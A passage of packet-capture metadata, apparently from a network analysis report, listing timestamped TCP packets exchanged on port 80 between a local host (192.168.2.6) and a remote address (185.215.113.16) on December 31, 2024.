Dec 31, 2024 09:48:43.818871975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818883896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.818885088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818897009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818901062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.818907022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818922997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818934917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818934917 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.818945885 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818955898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818955898 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.818962097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818968058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818973064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.818979025 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819017887 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819051027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819063902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819077015 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819087029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819094896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819097996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819109917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819111109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819120884 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819127083 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819132090 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819142103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819152117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819152117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819163084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819175959 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819180012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819190979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819192886 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819201946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819212914 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819220066 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819228888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819240093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819242954 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819256067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819267035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819277048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819277048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819287062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819291115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819298983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819308996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819323063 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819327116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819330931 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819338083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819349051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819360018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819370985 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819386005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819569111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819581032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819591999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819602966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819612980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819623947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819628000 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819638968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819645882 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819649935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819660902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819665909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819672108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819675922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819685936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819690943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819700956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819705963 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819711924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819722891 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819734097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819745064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819752932 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819755077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819766045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819771051 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819776058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819787025 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819792986 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819798946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819804907 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819840908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.819972038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819983959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.819993973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820003986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820014954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820019007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820024967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820035934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820038080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820046902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820060968 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820064068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820072889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820074081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820085049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820095062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820106030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820108891 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820116043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820126057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820126057 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820137024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820148945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820158958 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820158958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820169926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820173025 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820192099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820199013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820203066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820214033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820223093 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820224047 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820235014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820245981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820252895 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820255995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820266962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820277929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820277929 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820287943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820295095 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820297956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820303917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820308924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820308924 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820322990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820328951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820338011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820349932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820359945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820359945 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820369959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820382118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820389032 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820393085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820404053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820405960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820410013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820415974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820426941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820436954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820441961 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820466995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820467949 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820477962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820488930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820498943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820508957 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820508957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820519924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820525885 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820529938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820540905 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820544958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820555925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820565939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820566893 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820581913 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820590973 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820593119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820602894 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820615053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820625067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820628881 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820636034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820646048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820653915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820656061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820666075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820672035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820677042 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820687056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820698023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820708036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820719004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820730925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820734024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820734024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820740938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820743084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820751905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820763111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820763111 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820772886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820785999 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820810080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.820976019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820986986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.820997000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821007967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821017981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821024895 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821027994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821038961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821043015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821055889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821108103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821120024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821130037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821141005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821141958 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821151972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821156025 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821162939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821172953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821183920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821185112 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821193933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821197987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821204901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821214914 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821230888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821240902 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821240902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821252108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821268082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821279049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821288109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821289062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821300030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821310997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821316004 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821321011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821331024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821341038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821351051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821352005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821362019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821372032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821382999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821393013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821404934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.821412086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821412086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.821434975 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.856288910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.856302023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.856312037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.856384039 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.856384039 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858257055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858268023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858278990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858289957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858300924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858310938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858311892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858321905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858331919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858335972 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858342886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858360052 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858370066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858378887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858388901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858400106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858407974 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858407974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858441114 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858457088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858473063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858484030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858493090 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858509064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858509064 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858519077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858529091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858536005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858540058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858549118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858550072 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858560085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858571053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858582020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858582020 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858597040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858608007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858624935 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858634949 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858685017 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.858686924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858696938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858706951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.858730078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859077930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859095097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859107018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859117031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859127998 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859133005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859153986 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859168053 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859173059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859183073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859193087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859203100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859210968 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859220028 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859230995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859237909 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859242916 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859252930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859263897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859271049 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859272957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859299898 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859359980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859369993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859380007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859390974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859394073 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859401941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859412909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859421968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859432936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859441042 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859453917 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859469891 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859486103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859498024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859508038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859529972 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859595060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859603882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859612942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859622955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859635115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859658957 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859877110 CET	80	49754	185.215.113.16	192.168.2.6
